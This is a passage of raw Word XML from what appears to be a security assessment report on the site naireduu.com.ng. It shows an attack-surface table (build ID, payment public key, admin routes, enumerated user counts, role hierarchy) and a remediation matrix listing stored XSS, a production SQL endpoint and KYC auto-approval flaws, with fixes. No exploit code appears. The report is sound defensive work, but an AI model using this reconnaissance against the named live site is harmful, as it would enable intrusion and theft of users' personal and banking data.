                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>PostgreSQL with HikariCP connection pool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>varchar(255) error disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>React SPA + Vercel CDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JS bundle analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>External Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>naireduu.com.ng (Next.js on Vercel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Direct access + buildId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Gateway BuildId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mX1WYu9QKBAm5C4rpUkO9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>_next/data endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JWT (HS256, 7-day expiry, localStorage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JWT decoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Payment Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Squad (merchant: "Nairedu Prime Hub")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Checkout page metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Squad Public Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>pk_ebf366ed1f39584c5db717fbc64cd543fb18b0f7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>/api/payments/config + gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CORS Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Allow-Origin: * on gateway; crash on admin endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CORS headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Admin Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>94+ routes with role requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JS chunk extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Users Enumerated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>177+ including 4 admins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>User search + detect-bank</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role Hierarchy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>super_admin &gt; developer &gt; head_of_ops &gt; admin &gt; co_founder &gt; support &gt; user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Error messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>2FA Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Email-based (not TOTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>2FA endpoint response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Script Token System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>X-Script-Token-* for admin automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Response headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation Priority Matrix</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Key Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C1/C13/C15: Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Sanitize HTML, add CSP, use textContent not dangerouslySetInnerHTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C5: SQL endpoint in prod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Remove /admin/dev/sql/run from production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C8: JWT in localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Move to httpOnly, Secure, SameSite cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C9: Unauthenticated gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Add auth to naireduu.com.ng/api/checkout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C10: Backend URL exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Use internal URLs, route through Vercel proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C17-C19: KYC Identity Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Disable auto-approve, require admin review + doc verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C20: Bank PII enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Add rate limiting + step-up auth for PII access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C23: Affiliate XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Validate URL scheme, sanitize destination_url</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C25: User search PII</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Restrict search, require admin role for PII</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C2: Bank PII enum (detect-bank)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
